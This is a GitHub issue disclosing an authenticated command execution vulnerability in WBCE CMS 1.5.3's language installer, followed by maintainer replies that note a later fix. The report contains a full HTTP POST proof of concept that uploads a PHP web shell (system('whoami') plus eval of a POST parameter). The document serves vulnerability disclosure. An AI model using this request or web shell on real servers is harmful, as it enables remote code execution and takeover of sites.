Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Command execution vulnerability exists in WBCE CMS V1.5.3 background #544

Closed
secflag opened this issue Mar 14, 2023 · 2 comments
Closed

Command execution vulnerability exists in WBCE CMS V1.5.3 background #544

secflag opened this issue Mar 14, 2023 · 2 comments
Milestone
vlater

Comments

@secflag
Copy link

secflag commented Mar 14, 2023

Vulnerability description

There is a command execution vulnerability in the background of WBCE CMS V1.5.3.
Vulnerability URL /admin/languages/install.php Install Language module parameter filtering is not strict, there is a command execution vulnerability

Vulnerability analysis

In the receiving method on line 47 of the file /admin/languages/install.php, the system first saves the data submitted by the client to a temporary file, and then executes the relevant code to trigger the command execution vulnerability.

image-20230314132608851

Vulnerability verification process

POST /admin/languages/install.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://localhost/admin/languages/index.php
Cookie: phpsessid-5239-sid=hhh85m1as94tpdkq36vnjcommm; WBCELastConnectJS=1664417056; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------7377265762079
Content-Length: 496

-----------------------------7377265762079
Content-Disposition: form-data; name="formtoken"

67491209-95651bfdf4022592df7062726ca433cbba088a8b
-----------------------------7377265762079
Content-Disposition: form-data; name

Content-Type: application/octet-stream

<?php echo(system('whoami'));@eval($_POST[stcs]);?>
-----------------------------7377265762079
Content-Disposition: form-data; name="submit"


-----------------------------7377265762079—

image-20230314132722979
@instantflorian
Copy link
Contributor

Thanks for reporting.
The vulnerability is only accessable if a malicious user has a) backend access and b) is allowed to install languages. Fixing the issue would mean to apply conceptional changes to the whloe language management; so actually it is in the responsibility of the site administrator to grant access only to trustworthy users and only the areas they really need (e.g. editing contents but not installing modules, languages etc.).
Nevertheless we will take this into consideration for a later version.

@instantflorian instantflorian added this to the vlater milestone Mar 17, 2023
@instantflorian
Copy link
Contributor

fixed with e434944

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
vlater
Development

No branches or pull requests
2 participants
@instantflorian @secflag